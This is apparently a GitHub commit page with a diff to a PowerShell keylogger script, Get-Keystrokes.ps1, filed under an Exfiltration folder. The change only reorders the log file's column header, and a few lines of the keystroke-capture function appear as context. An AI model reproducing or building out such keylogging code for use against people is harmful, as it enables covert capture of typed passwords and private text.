We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
2 parents 5b1a775 + 0045054 commit 2153a0aCopy full SHA for 2153a0a
Exfiltration/Get-Keystrokes.ps1
@@ -49,7 +49,7 @@ function Get-Keystrokes {
49
$Initilizer = {
50
$LogPath = 'REPLACEME'
51
52
- '"TypedKey","Time","WindowTitle"' | Out-File -FilePath $LogPath -Encoding unicode
+ '"WindowTitle","TypedKey","Time"' | Out-File -FilePath $LogPath -Encoding unicode
53
54
function KeyLog {
55
[Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms') | Out-Null
0 commit comments